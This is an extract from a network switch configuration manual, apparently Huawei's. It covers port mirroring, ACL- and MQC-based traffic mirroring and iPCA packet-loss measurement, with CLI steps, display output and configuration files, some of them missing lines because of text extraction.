----------------------------------------------------------------------
Index : 3
Untag-packet : No
----------------------------------------------------------------------

----------------------------------------------------------------------
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
----------------------------------------------------------------------
----------------------------------------------------------------------
----End
Configuration Files
#
sysname Switch
#
#
#
return

Related Content
Support Community

Configuration)
Videos
18.3.3 Example for Configuring Local Port Mirroring (1:N

Mirroring in Which Observing Ports Are Configured in a Batch)
1:N Mirroring Overview

In 1:N mirroring, packets on one mirrored port are copied to N observing ports so that the
packets can be copied to different monitoring devices for analysis and processing.
In 1:N mirroring, multiple observing ports need to be configured and connected to different
monitoring devices. Observing ports can be configured one by one or in a batch. The single
and batch configuration modes can be used simultaneously. Observing ports configured in a
batch can be bound to the same mirrored port to simplify the configuration of 1:N mirroring.
Therefore, batch configuration is recommended in 1:N mirroring.
Configuration Notes
observing ports.
ports.
l In 1:N mirroring, if you batch configure either inbound or outbound packets to be copied
from a mirrored port to multiple observing ports, the packets cannot be copied to other
observing ports.
l The following table lists the applicable products and versions of this configuration
example.


S12704 V200R008C00, and V200R009C00
S12708 and S12712 V200R005C00, V200R006C00, V200R007C00,

V200R007C20, V200R008C00, and V200R009C00
NOTE
As shown in Figure 18-10, the R&D department of a company accesses the Internet through
the Switch, and monitoring devices Server1, Server2, and Server3 are directly connected to
the Switch.
Internet access traffic of the R&D department needs to be mirrored to different servers for
In te rn e t
S e rve r1
/4
1 /0
GE S e rve r2
S w itch
G E 1 /0 /3
G E 1 /0 /1 GE
1 /0
/2 S e rve r3
R&D
d e p a rtm e n t
M irro re d p o rt
1. Configure GE1/0/2 through GE1/0/4 of the Switch as local observing ports to forward

2. Configure GE1/0/1 of the Switch as a mirrored port to copy the traffic passing through it
to different local observing ports.
Procedure
# Configure GE1/0/2 through GE1/0/4 of the Switch as local observing ports in a batch.
[Switch] observe-port 1 interface-range gigabitethernet 1/0/2 to gigabitethernet
1/0/4 //Configure GE1/0/2 through GE1/0/4 as local observing ports in a batch
and share the same observing port 1.
mirrored port to local observing ports.

----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface-range: GigabitEthernet1/0/2 to GigabitEthernet1/0/4
----------------------------------------------------------------------

----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/2 to GigabitEthernet1/0/4
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
----------------------------------------------------------------------
----------------------------------------------------------------------
----End
Configuration Files
#
sysname Switch
#
observe-port 1 interface-range GigabitEthernet1/0/2 to GigabitEthernet1/0/4
#
#
return

Related Content
Support Community
Configuration)
Videos
18.3.4 Example for Configuring Local Port Mirroring (N:1

Mirroring)
N:1 Mirroring Overview

In N:1 mirroring, packets on N mirrored ports are copied to one observing port so that packets
on different ports can be copied to the same monitoring device for analysis.
Configuration Notes
observing ports.
ports.
l This example applies to all models.
As shown in Figure 18-11, three departments (science and technology department 1, science
and technology department 2, and administrative department) of a company access the
Internet through the Switch, and the monitoring device Server is directly connected to the
Switch.
Internet access traffic of the three departments needs to be monitored through the Server.

In te rn e t
S e rve r
G E 1 /0 /4
S w itch
/1 G
/0 E1
E1 /0
GE1/0/2
G /3
S c ie n c e a n d S c ie n c e a n d A d m in is tra tiv e
T e c h n o lo g y T e c h n o lo g y d e p a rtm e n t
d e p a rtm e n t 1 d e p a rtm e n t 2
H o stA H o stB H o stC H o stD H o stE H o stF
M irro re d p o rt
L o c a l o b s e rv in g p o rt
O rig in a l p a c k e ts
M irro re d p a c k e ts
the Server.
2. Configure GE1/0/1 through GE1/0/3 of the Switch as mirrored ports to copy Internet
access traffic of the three departments to the local observing port.
Procedure
Step 2 Configure mirrored ports.

# Configure GE1/0/1 through GE1/0/3 of the Switch as mirrored ports to copy the packets
received by the mirrored ports to the local observing port.



----------------------------------------------------------------------
Index : 1
Untag-packet : No
----------------------------------------------------------------------

----------------------------------------------------------------------
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
----------------------------------------------------------------------
----------------------------------------------------------------------
----End
Configuration Files
#
sysname Switch
#
#
#
#
#
return
Related Content
Support Community

Configuration)
Videos

18.3.5 Example for Configuring Local Port Mirroring (M:N

Mirroring)
M:N Mirroring Overview

In M:N mirroring, packets on M mirrored ports are copied to N observing ports so that
packets on multiple ports can be copied to different monitoring devices for analysis and
processing.
An M:N mirroring rule is equivalent to multiple 1:N mirroring rules and also requires
multiple observing ports to be configured and connected to different monitoring devices.
Observing ports can be configured one by one or in a batch. The single and batch
configuration modes can be used simultaneously. Observing ports configured in a batch can
be bound to the same mirrored port to simplify the configuration of M:N mirroring.
Therefore, batch configuration is recommended in M:N mirroring.
Configuration Notes
observing ports.
ports.
l In M:N mirroring, if you batch configure either inbound or outbound packets to be
copied from a mirrored port to multiple observing ports, the packets cannot be copied to
other observing ports.
l In this configuration example, observing ports are configured in a batch, so applicable
products and versions of this example are the same as 18.3.3 Example for Configuring
Local Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured in
a Batch). If observing ports are configured one by one, applicable products and versions
of the configuration example are the same as 18.3.2 Example for Configuring Local
Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured One by
One).
As shown in Figure 18-12, three departments (R&D department 1, R&D department 2, and
Marketing department) of a company access the Internet through the Switch, and monitoring
devices Server1 and Server2 are directly connected to the Switch.
Internet access traffic of the three departments needs to be mirrored to different servers for

In te rn e t
S e rve r1 S w itch S e rve r2

G E 1 /0 /4 G E 1 /0 /5
/1 G
/0 E1
E1 /0
GE1/0/2
G /3
R&D R&D M a rke tin g

d e p a rtm e n t 1 d e p a rtm e n t 2 d e p a rtm e n t
H o stA H o stB H o stC H o stD H o stE H o stF
M irro re d p o rt
1. Configure GE1/0/4 and GE1/0/5 of the Switch as local observing ports to forward
2. Configure GE1/0/1 through GE1/0/3 of the Switch as mirrored ports to copy the traffic
passing through the mirrored ports to different local observing ports.
Procedure
# Configure GE1/0/4 and GE1/0/5 of the Switch as local observing ports in a batch.
[Switch] observe-port 1 interface-range gigabitethernet 1/0/4 gigabitethernet
1/0/5 //Configure GE1/0/4 and GE1/0/5 as local observing ports in a batch and
share observing port 1.
Step 2 Configure mirrored ports.

# Configure GE1/0/1 through GE1/0/3 of the Switch as mirrored ports to copy the packets
received by the mirrored ports to different local observing ports.



----------------------------------------------------------------------
Index : 1
Untag-packet : No
Interface-range: GigabitEthernet1/0/4 to GigabitEthernet1/0/5
----------------------------------------------------------------------

----------------------------------------------------------------------
Observe-port 1 : GigabitEthernet1/0/4 to GigabitEthernet1/0/5
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
----------------------------------------------------------------------
----------------------------------------------------------------------
----End
Configuration Files
#
sysname Switch
#
observe-port 1 interface-range GigabitEthernet1/0/4 to GigabitEthernet1/0/5
#
#
#
#
return
Related Content
Support Community

Configuration)
Videos

18.3.6 Example for Configuring Layer 2 Remote Port Mirroring
Layer 2 Remote Port Mirroring Overview

In Layer 2 remote port mirroring, an observing port is connected to a monitoring device
through a Layer 2 network. After the observing port receives mirrored packets from a
mirrored port, the observing port adds a VLAN tag corresponding to the Layer 2 network to
the packets and forwards the packets to the Layer 2 network. An intermediate Layer 2 device
then sends the packets to the monitoring device.
Configuration Notes
observing ports.
ports.
l The vlan vlan-id parameter will be specified during the configuration of a Layer 2
remote observing port, indicating that the Layer 2 remote observing port can send
mirrored packets to the monitoring device through the specified VLAN. In this situation,
the Layer 2 remote observing port does not need to be added to the specified VLAN.
As shown in Figure 18-13, the administrative department of a company accesses the Internet
through SwitchA, and the monitoring device Server is connected to SwitchA through
SwitchB.
Internet access traffic of the administrative department needs to be monitored through the
Server.

Figure 18-13 Layer 2 remote port mirroring networking
In te rn e t
G E 1 /0 /2 G E 1 /0 /2
VLAN10
G E 1 /0 /1 G E 1 /0 /1
A d m in is tra tiv e
d e p a rtm e n t
S e rve r
C o m m o n p o rt
M irro re d p o rt
R e m o te o b se rvin g p o rt
1. Configure GE1/0/2 of SwitchA as a Layer 2 remote observing port to forward mirrored
packets to the specified VLAN.
2. Configure GE1/0/1 of SwitchA as a mirrored port to copy Internet access traffic of the
administrative department to the Layer 2 remote observing port.
3. Create a VLAN on SwitchB, and add ports to the VLAN to forward the mirrored packets
sent from the observing port to the Server.
Procedure
Step 1 Configure an observing port on SwitchA.
# Configure GE1/0/2 of SwitchA as a Layer 2 remote observing port and bind the observing
port to VLAN 10.
[SwitchA] observe-port 1 interface gigabitethernet 1/0/2 vlan 10 //Configure
GE1/0/2 as Layer 2 remote observing port 1, and add it to VLAN 10.
After the configuration is complete, the observing port forwards mirrored packets to VLAN
10 removing the need to add the observing port to the VLAN.
Step 2 Configure a mirrored port on SwitchA.
# Configure GE1/0/1 of SwitchA as a mirrored port to copy the packets received by the
mirrored port to the Layer 2 remote observing port.


[SwitchA-GigabitEthernet1/0/1] port-mirroring to observe-port 1 inbound //
[SwitchA-GigabitEthernet1/0/1] return
Step 3 Create a VLAN on SwitchB and add ports to the VLAN.

# Create VLAN 10 on SwitchB and add GE1/0/1 and GE1/0/2 to VLAN 10.
[SwitchB-GigabitEthernet1/0/1] port link-type access //Set the link type of
the interface on the monitoring device to access. The default link type of
interfaces is not access.
[SwitchB-GigabitEthernet1/0/2] port link-type trunk //Set the link type of
the interface on the network side to trunk. The default link type of interfaces
is not trunk.
[SwitchB-GigabitEthernet1/0/2] return

<SwitchA> display observe-port
----------------------------------------------------------------------
Index : 1
Untag-packet : No
Vlan : 10
----------------------------------------------------------------------

<SwitchA> display port-mirroring
----------------------------------------------------------------------
----------------------------------------------------------------------
Port-mirror:
----------------------------------------------------------------------
----------------------------------------------------------------------
----------------------------------------------------------------------
----End
Configuration Files
#
sysname SwitchA
#
observe-port 1 interface GigabitEthernet1/0/2 vlan 10
#
#
return

#
sysname SwitchB

#
vlan batch 10
#
#
#
return
Related Content
Support Community

Configuration)
Videos
18.3.7 Example for Configuring MQC-based Local Traffic

Mirroring
Local Traffic Mirroring Overview

In local traffic mirroring, service traffic matching configured rules is copied to an observing
port that is directly connected to a monitoring device for analysis and monitoring.
You can configure traffic mirroring using Modular QoS Command-Line Interface (MQC) and
ACL. MQC-based traffic mirroring is complex to configure but supports more matching rules
and can be applied to both the inbound and outbound directions. ACL-based traffic mirroring
is easy to configure but supports fewer matching rules than MQC-based traffic mirroring.
Configuration Notes
observing ports.
ports.

As shown in Figure 18-14, the science and technology department and administrative
department of a company use 10.1.1.0/24 and 10.1.2.0/24 respectively to access the Internet
or communicate with each other through the Switch. The monitoring device Server is directly
connected to the Switch.
The following traffic of the science and technology department needs to be monitored through
the Server:
l Internet access traffic
l Traffic sent to the administrative department
Figure 18-14 Local traffic mirroring networking
In te rn e t
Service flow 1
S e rvice flo w 2
S e rve r
S e rvice flo w 1
S w itch
G E 1 /0 /2
ce w 2
1
Se
/1
w
o
1/0
flo
Se ice fl
rvi
ce
GE
rv
rvi
flo
Se
w
2
H o stA H o stB H o stC H o stD
S cie n ce a n d T e ch n o lo g y A d m in istra tive d e p a rtm e n t:

d e p a rtm e n t: 1 0 .1 .1 .0 /2 4 1 0 .1 .2 .0 /2 4
M irro re d p o rt
T ra ffic fro m th e scie n ce a n d te ch n o lo g y
S e rvice flo w 1
d e p a rtm e n t to th e In te rn e t
S e rvice flo w 2 d e p a rtm e n t to th e a d m in istra tive d e p a rtm e n t
the Server.
2. Configure a traffic classifier on the Switch to match Internet access traffic and traffic
sent to the administrative department, and configure a traffic behavior to mirror traffic to
a local observing port.
3. Configure a traffic policy on the Switch, bind the traffic classifier and traffic behavior to
the traffic policy, and apply the traffic policy to GE1/0/1.

Procedure

# Create a traffic classifier c1 on the Switch, and configure rules to match two types of traffic:
traffic with source network segment 10.1.1.0/24 and destination TCP port number WWW and
traffic with source network segment 10.1.1.0/24 and destination network segment 10.1.2.0/24.
[Switch] acl number 3000 //Create ACL 3000 to allow the packets with source
network segment 10.1.1.0/24 and destination TCP port number WWW to pass through.
[Switch-acl-adv-3000] rule permit tcp source 10.1.1.0 0.0.0.255 destination-port
eq www
network segment 10.1.1.0/24 and destination network segment 10.1.2.0/24 to pass
through.
10.1.2.0 0.0.0.255
[Switch] traffic classifier c1 operator or //Create a traffic classifier c1,
and match ACL 3000 or ACL 3001.

# Create a traffic behavior b1 on the Switch, and define traffic mirroring in the traffic
behavior to copy specified traffic to local observing port GE1/0/2.
[Switch] traffic behavior b1 //Create a traffic behavior b1 to mirror
specified traffic to observing port 1.
[Switch-behavior-b1] mirroring to observe-port 1
# Create a traffic policy named p1 on the Switch, bind the traffic behavior and traffic
classifier to the traffic policy, and apply the traffic policy to the inbound direction of GE1/0/1
to monitor specified traffic of the science and technology department.
[Switch] traffic policy p1 //Create a traffic policy p1 and bind the traffic
behavior and traffic classifier to the traffic policy.
[Switch-GigabitEthernet1/0/1] traffic-policy p1 inbound //Apply the traffic
policy p1 to the inbound direction of GE1/0/1.

<Switch> display traffic classifier user-defined c1
Classifier: c1
Precedence: 5

Operator: OR
if-match acl 3001

<Switch> display traffic policy user-defined p1
Policy: p1
Classifier: c1
Operator: OR
Behavior: b1
Permit
Mirroring to observe-port 1

----------------------------------------------------------------------
Index : 1
Untag-packet : No
----------------------------------------------------------------------
# Check the mirroring configuration.

----------------------------------------------------------------------
----------------------------------------------------------------------
Stream-mirror:
----------------------------------------------------------------------
Behavior Direction Observe-port
----------------------------------------------------------------------
1 b1 - Observe-port 1
----------------------------------------------------------------------
----End
Configuration Files
#
sysname Switch
#
#
acl number 3000
rule 5 permit tcp source 10.1.1.0 0.0.0.255 destination-port eq www
acl number 3001
#
if-match acl 3000
if-match acl 3001
#
traffic behavior b1
permit
mirroring to observe-port 1
#
#
#
return

Related Content
Support Community

Configuration)
Videos
18.3.8 Example for Configuring ACL-based Local Traffic

Mirroring
Local Traffic Mirroring Overview

In local traffic mirroring, service traffic matching configured rules is copied to an observing
port that is directly connected to a monitoring device for analysis and monitoring.
is easy to configure but supports fewer matching rules than MQC-based traffic mirroring.
Configuration Notes
observing ports.
ports.
As shown in Figure 18-15, the science and technology department and administrative
department of a company use 10.1.1.0/24 and 10.1.2.0/24 respectively to access the Internet
or communicate with each other through the Switch. The monitoring device Server is directly
connected to the Switch.
The following traffic of the science and technology department needs to be monitored through
the Server:

l Internet access traffic

l Traffic sent to the administrative department
Figure 18-15 Local traffic mirroring networking
In te rn e t
Service flow 1
S e rvice flo w 2
S e rve r
S e rvice flo w 1
S w itch
G E 1 /0 /2
ce w 2
1
Se
/1
w
o
1/0
flo
Se ice fl
rvi
ce
GE
rv
rvi
flo
Se
w
2
H o stA H o stB H o stC H o stD
S cie n ce a n d T e ch n o lo g y A d m in istra tive d e p a rtm e n t:

d e p a rtm e n t: 1 0 .1 .1 .0 /2 4 1 0 .1 .2 .0 /2 4
M irro re d p o rt
S e rvice flo w 1
d e p a rtm e n t to th e In te rn e t
S e rvice flo w 2 d e p a rtm e n t to th e a d m in istra tive d e p a rtm e n t
the Server.
2. Configure advanced ACLs to match two types of traffic of the science and technology
department: Internet access traffic and traffic sent to the administrative department.
3. Configure an ACL-based traffic policy on GE1/0/1 to mirror the matching traffic.
Procedure

as local observing port 1.

Step 2 Configure advanced ACLs.

# Create two advanced ACLs numbered 3000 and 3001 on the Switch, configure ACL 3000
to match traffic with source network segment 10.1.1.0/24 and destination TCP port number
WWW, and configure ACL 3001 to match traffic with source network segment 10.1.1.0/24
and destination network segment 10.1.2.0/24.
network segment 10.1.1.0/24 and destination TCP port number WWW to pass through.
[Switch-acl-adv-3000] rule permit tcp source 10.1.1.0 0.0.0.255 destination-port
eq www
network segment 10.1.1.0/24 and destination network segment 10.1.2.0/24 to pass
through.
10.1.2.0 0.0.0.255
[Switch] traffic classifier c1 operator or //Create a traffic classifier c1,
and match ACL 3000 or ACL 3001.
Step 3 Configure an ACL-based traffic policy.

# Configure an ACL-based traffic policy on GE1/0/1 of the Switch to mirror the matching
traffic.
[Switch-GigabitEthernet1/0/1] traffic-mirror inbound acl 3000 to observe-port
1 //Mirror the incoming packets that match ACL 3000 on GE1/0/1 to observing
port 1.
[Switch-GigabitEthernet1/0/1] traffic-mirror inbound acl 3001 to observe-port
1 //Mirror the incoming packets that match ACL 3001 on GE1/0/1 to observing
port 1.

# Check ACL rules and traffic behavior information.
<Switch> display traffic-applied interface gigabitethernet 1/0/1 inbound
-----------------------------------------------------------
ACL applied inbound interface GigabitEthernet1/0/1
ACL 3000
rule 5 permit tcp source 10.1.1.0 0.0.0.255 destination-port eq www (match-
counter 0)
ACTIONS:
mirror to observe-port 1
-----------------------------------------------------------
ACL 3001
rule 5 permit ip source 10.1.1.0 0.0.0.255 destination 10.1.2.0 0.0.0.255 (match-
counter 0)
ACTIONS:
-----------------------------------------------------------

----------------------------------------------------------------------
Index : 1
Untag-packet : No
----------------------------------------------------------------------

# Check the mirroring configuration.

----------------------------------------------------------------------
----------------------------------------------------------------------
Stream-mirror:
----------------------------------------------------------------------
----------------------------------------------------------------------
1 SACL - Observe-port 1
----------------------------------------------------------------------
----End
Configuration Files
#
sysname Switch
#
#
acl number 3000
rule 5 permit tcp source 10.1.1.0 0.0.0.255 destination-port eq www
acl number 3001
#
traffic-mirror inbound acl 3000 to observe-port 1
#
return
Related Content
Support Community

Configuration)
Videos
18.3.9 Example for Configuring MQC-based Remote Traffic

Mirroring
Remote Traffic Mirroring Overview

In remote traffic mirroring, service traffic matching configured rules is copied to an observing
port that is connected to a monitoring device through an intermediate network for analysis and
monitoring.

is easy to configure but supports fewer matching rules than MQC-based traffic mirroring and
can be applied to only the inbound direction.
Configuration Notes
observing ports.
As shown in Figure 18-16, external users on the Internet access the servers of a company
through SwitchA. The antivirus monitoring device Server connects to SwitchA through
SwitchB.
The official website of the company is paralyzed because of malicious attacks. The Server
needs to remotely analyze traffic with TCP port number WWW to locate the attack source.
Figure 18-16 Remote traffic mirroring networking

E xte rn a l u se rs
In te rn e t
G E 1 /0 /1
VLAN 10
G E 1 /0 /2 G E 1 /0 /2 G E 1 /0 /1
D a ta
ce n te r
A n tiviru s
m o n ito rin g S e rve r
S e rve r1 S e rve r2 S e rve r3
C o m m o n p o rt
M irro re d p o rt

2. Configure a traffic classifier on SwitchA to match traffic with TCP port number WWW,
and configure a traffic behavior to mirror packets to the observing port.
3. Configure a traffic policy on SwitchA, bind the traffic classifier and traffic behavior to
the traffic policy, and apply the traffic policy to GE1/0/1.
Procedure
port to VLAN 10.
Step 2 Configure a traffic classifier on SwitchA.
# Create a traffic classifier c1 on SwitchA to match traffic with TCP port number WWW.
[SwitchA] acl number 3000 //Create ACL 3000 to allow the packets with the TCP
port number WWW to pass through.
[SwitchA-acl-adv-3000] rule permit tcp destination-port eq www
[SwitchA] traffic classifier c1 //Create a traffic classifier c1, and match
ACL 3000.
[SwitchA-classifier-c1] if-match acl 3000
[SwitchA-classifier-c1] quit
Step 3 Configure a traffic behavior on SwitchA.

# Create a traffic behavior b1 on SwitchA, and define traffic mirroring in the traffic behavior
to copy specified traffic to observing port GE1/0/2.
[SwitchA] traffic behavior b1 //Create a traffic behavior b1, and define
traffic mirroring to mirror specified traffic to observing port 1.
[SwitchA-behavior-b1] mirroring to observe-port 1
[SwitchA-behavior-b1] quit
Step 4 Configure a traffic policy on SwitchA to apply it to an interface.

# Create a traffic policy p1 on SwitchA, bind the traffic behavior and traffic classifier to the
traffic policy, and apply the traffic policy to the inbound direction of GE1/0/1 to monitor
traffic with a specified TCP port number.
[SwitchA] traffic policy p1 //Create a traffic policy p1, and bind the
traffic behavior and traffic classifier to the traffic policy.
[SwitchA-trafficpolicy-p1] classifier c1 behavior b1
[SwitchA-trafficpolicy-p1] quit

[SwitchA-GigabitEthernet1/0/1] traffic-policy p1 inbound //Apply the traffic

policy to the inbound direction of GE1/0/1.

is not trunk.

<SwitchA> display traffic classifier user-defined c1
Classifier: c1
Precedence: 5
Operator: OR

<SwitchA> display traffic policy user-defined p1
Policy: p1
Classifier: c1
Operator: OR
Behavior: b1
Permit
Mirroring to observe-port 1

----------------------------------------------------------------------
Index : 1
Untag-packet : No
Vlan : 10
----------------------------------------------------------------------

----------------------------------------------------------------------
----------------------------------------------------------------------
Stream-mirror:
----------------------------------------------------------------------
----------------------------------------------------------------------
1 b1 - Observe-port 1
----------------------------------------------------------------------
----End

Configuration Files
#
sysname SwitchA
#
#
acl number 3000
#
if-match acl 3000
#
traffic behavior b1
permit
mirroring to observe-port 1
#
#
#
return

#
sysname SwitchB
#
vlan batch 10
#
#
#
return
Related Content
Support Community
Configuration)
Videos
18.3.10 Example for Configuring ACL-based Remote Traffic

Mirroring

Remote Traffic Mirroring Overview

In remote traffic mirroring, service traffic matching configured rules is copied to an observing
port that is connected to a monitoring device through an intermediate network for analysis and
monitoring.
is easy to configure but supports fewer matching rules than MQC-based traffic mirroring and
can be applied to only the inbound direction.
Configuration Notes
observing ports.
As shown in Figure 18-17, external users on the Internet access the servers of a company
through SwitchA. The antivirus monitoring device Server connects to SwitchA through
SwitchB.
The official website of the company is paralyzed because of malicious attacks. The Server
needs to remotely analyze traffic with TCP port number WWW to locate the attack source.

Figure 18-17 Remote traffic mirroring networking

E xte rn a l u se rs
In te rn e t
G E 1 /0 /1
VLAN 10
G E 1 /0 /2 G E 1 /0 /2 G E 1 /0 /1
D a ta
ce n te r
A n tiviru s
m o n ito rin g S e rve r
S e rve r1 S e rve r2 S e rve r3
C o m m o n p o rt
M irro re d p o rt
2. Configure an advanced ACL on SwitchA to match traffic with TCP port number WWW.
3. Configure an ACL-based traffic policy on GE1/0/1 of SwitchA to mirror the matching
traffic.
Procedure
port to VLAN 10.

Step 2 Configure an advanced ACL on SwitchA.

# Create an advanced ACL numbered 3000 on SwitchA to match traffic with TCP port
number WWW.
[SwitchA] acl number 3000 //Create ACL 3000 to allow the packets with the TCP
port number WWW to pass through.
[SwitchA-acl-adv-3000] rule permit tcp destination-port eq www
Step 3 Configure an ACL-based traffic policy on SwitchA.

# Configure an ACL-based traffic policy on GE1/0/1 of SwitchA to mirror the matching
traffic.
[SwitchA-GigabitEthernet1/0/1] traffic-mirror inbound acl 3000 to observe-port
1 //Mirror incoming packets that match ACL 3000 on GE1/0/1 to observing port
1.

is not trunk.

# Check ACL rules and traffic behavior information.
<SwitchA> display traffic-applied interface gigabitethernet 1/0/1 inbound
-----------------------------------------------------------
ACL applied inbound interface GigabitEthernet1/0/1
ACL 3000
rule 5 permit tcp destination-port eq www (match-counter 0)
ACTIONS:
-----------------------------------------------------------

----------------------------------------------------------------------
Index : 1
Untag-packet : No
Vlan : 10
----------------------------------------------------------------------

----------------------------------------------------------------------

----------------------------------------------------------------------
Stream-mirror:
----------------------------------------------------------------------
----------------------------------------------------------------------
1 SACL - Observe-port 1
----------------------------------------------------------------------
----End
Configuration Files
#
sysname SwitchA
#
#
acl number 3000
#
#
return

#
sysname SwitchB
#
vlan batch 10
#
#
#
return
Related Content
Support Community
Configuration)
Videos

18.4 Typical iPCA Configuration

18.4.1 Example for Configuring iPCA to Implement End-to-End
Packet Loss Measurement
iPCA Overview
Packet Conservation Algorithm for Internet (iPCA) technology is used to measure IP network
performance. It directly marks service packets to implement network-level and device-level
packet loss measurements.
In the all-IP era, various services sensitive to packet loss, such as voice and video services, are
transmitted through an IP network. To detect packet loss and find out packet loss points on the
network, Huawei developed iPCA technology. Huawei iPCA has the following
characteristics:
l iPCA applies to both Layer 2 and Layer 3 networks.

l iPCA directly marks service packets to obtain the packet loss ratio and number of lost
packets, without increasing loads on devices.
l iPCA supports packet loss statistics collection on multipoint-to-multipoint networks.
End-to-end packet loss measurement: Statistics are collected on edge devices that are a part of
the transit network. This method is applicable to packet loss measurement for a specialized
service flow, such as a voice flow and a video flow, on an enterprise network.
Configuration Notes
l A modular switch can support iPCA only after being equipped with an X1E card.
l The prerequisite for network-level packet loss measurement is time synchronization
among all devices. Therefore, before configuring iPCA on devices, configure the
Network Time Protocol (NTP) on the devices.
l In network-level packet loss measurement, target flows can be defined by users.
l In network-level packet loss measurement, the current version can only measure known
IP unicast packets but cannot measure unknown IP unicast packets. If unknown IP
unicast packets are measured, the measurement result may be inaccurate.
l Network-level packet loss measurement is based on target flows. If the packet content is
modified (for example, NAT is performed on packets, packets are encapsulated in
tunnels, and packet priority is changed), the device cannot precisely match the packets,
so the measurement result may be inaccurate.

S12704 V200R008C00, V200R009C00
S12708 and S12712 V200R006C00, V200R007C00, V200R007C20,

V200R008C00, and V200R009C00

As shown in Figure 18-18, users in enterprise branches and headquarters encounter erratic
display and delay when using the video conference service. The enterprise wants to obtain
packet loss statistics of the video conference service and receive an alarm when the packet
loss ratio exceeds 7% so that the network administrator can adjust service deployment in a
timely manner.
Figure 18-18 Networking diagram of end-to-end packet loss measurement
Video terminal
10.2.1.0/24
GE1/0/1 GE1/0/1
WAN
Video terminal Switch_1 Switch_2

10.1.1.0/24 Branch Headquarters
Forward flow
Backward flow
1. Configure a service flow between video terminals as a target flow. It is a bidirectional
symmetrical flow, so is divided into two unidirectional flows logically.
2. Configure Switch_1 as DCP1. Bind GE1/0/1 where the target flow passes to in-point
ingress TLP of DCP1. Define instance 1 on DCP1 to collect statistics data of the target
flow from TLPs.
3. Configure Switch_2 as DCP2. Bind GE1/0/1 where the target flow passes to out-point
egress TLP of DCP2. Define instance 1 on DCP2 to collect statistics data of the target
flow from TLPs.
4. Configure Switch_2 as the MCP to aggregate statistics data from DCP1 and DCP2 and
export the statistics result. Configure packet loss alarm thresholds to help users predict
network faults. When the packet loss ratio exceeds 7%, an alarm is reported; when the
packet loss ratio falls below 5%, a clear alarm is reported.
5. Retain the default values of color bit, measurement interval, and UDP port number used
for communication between DCPs and MCP.
NOTE
Before configuring iPCA to implement end-to-end packet loss measurement, ensure that static routes or
dynamic routing protocols have been configured to implement network connectivity between Switch_1
and Switch_2.
Before configuring iPCA to implement end-to-end packet loss measurement, ensure that NTP has been
configured to implement time synchronization between Switch_1 and Switch_2.
Procedure
Step 1 Configure Switch_1 as DCP1, set the DCP ID of Switch_1 to the router ID 1.1.1.1, and
configure TLP 1.

[Switch_1] nqa ipfpm dcp //Enable the global DCP function.
[Switch_1-nqa-ipfpm-dcp] dcp id 1.1.1.1 //Set the DCP ID to 1.1.1.1.
[Switch_1-nqa-ipfpm-dcp] instance 1 //Create measurement instance 1 on the DCP.
[Switch_1-nqa-ipfpm-dcp-instance-1] mcp 2.2.2.2 //Associate measurement instance
1 with an MCP.
[Switch_1-nqa-ipfpm-dcp-instance-1] flow bidirectional source 10.1.1.0 24
destination 10.2.1.0 24 //Configure the target flow in measurement instance 1 as
a bidirectional symmetrical flow with the source address segment 10.1.1.0 and
destination address segment 10.2.1.0.
[Switch_1-nqa-ipfpm-dcp-instance-1] tlp 1 in-point ingress //Set the TLP ID to 1
and configure the TLP to color the incoming target flow. The target flow arrives
at the TLP.
[Switch_1-nqa-ipfpm-dcp-instance-1] quit
[Switch_1-nqa-ipfpm-dcp] quit
[Switch_1-GigabitEthernet1/0/1] ipfpm tlp 1 //Bind the interface to the TLP.
[Switch_1] nqa ipfpm dcp
[Switch_1-nqa-ipfpm-dcp] instance 1
[Switch_1-nqa-ipfpm-dcp-instance-1] loss-measure enable continual //Enable
continual packet loss measurement.
configure TLP 2.
[Switch_2-nqa-ipfpm-dcp] dcp id 2.2.2.2
[Switch_2-nqa-ipfpm-dcp-instance-1] mcp 2.2.2.2
[Switch_2-nqa-ipfpm-dcp-instance-1] flow bidirectional source 10.1.1.0 24
destination 10.2.1.0 24
[Switch_2-nqa-ipfpm-dcp-instance-1] tlp 2 out-point egress
[Switch_2-GigabitEthernet1/0/1] ipfpm tlp 2
[Switch_2-nqa-ipfpm-dcp-instance-1] loss-measure enable continual
Step 3 Configure Switch_2 as the MCP.

[Switch_2] nqa ipfpm mcp //Enable the global MCP function.
[Switch_2-nqa-ipfpm-mcp] mcp id 2.2.2.2 //Set the MCP ID to 2.2.2.2.
[Switch_2-nqa-ipfpm-mcp] instance 1 //Create measurement instance 1 on the MCP.
[Switch_2-nqa-ipfpm-mcp-instance-1] dcp 1.1.1.1 //Associate measurement instance
1 with the DCP whose ID is 1.1.1.1.
[Switch_2-nqa-ipfpm-mcp-instance-1] dcp 2.2.2.2 //Associate measurement instance
1 with the DCP whose ID is 2.2.2.2.
[Switch_2-nqa-ipfpm-mcp-instance-1] loss-measure ratio-threshold upper-limit 7
lower-limit 5 //Set the packet loss alarm threshold to 7% and clear alarm
threshold to 5%.
[Switch_2-nqa-ipfpm-mcp-instance-1] quit
[Switch_2-nqa-ipfpm-mcp] quit
[Switch_2] quit
# Run the display ipfpm statistic-type loss instance 1 command on Switch_2 that functions
as the MCP to view the packet loss measurement result.

<Switch_2> display ipfpm statistic-type loss instance 1
Latest loss statistics of forward flow:

----------------------------------------------------------------------------------
--------
LossRatio(b)
----------------------------------------------------------------------------------
--------
127636768 381549 4.514649% 40444194
4.514649%
127636767 381528 4.514620% 40441968
4.514620%
127636766 381318 4.514996% 40419708
4.514996%
127636765 381192 4.514686% 40406352
4.514686%
127636764 381381 4.514679% 40426386
4.514679%
127636763 381402 4.514748% 40428612
4.514748%
127636762 381081 4.514797% 40394586
4.514797%
127636761 381324 4.514702% 40420344
4.514702%
127636760 381549 4.514870% 40444194
4.514870%
127636759 381066 4.514638% 40392996
4.514638%
127636758 381570 4.514836% 40446420
4.514836%
127636757 382452 4.514757% 40539912
4.514757%
Latest loss statistics of backward flow:

----------------------------------------------------------------------------------
--------
LossRatio(b)
----------------------------------------------------------------------------------
--------
127636768 381087 4.513306% 40395222
4.513306%
127636767 381129 4.513384% 40399674
4.513384%
127636766 381465 4.513444% 40435290
4.513444%
127636765 381087 4.513222% 40395222
4.513222%
127636764 381045 4.513272% 40390770
4.513272%
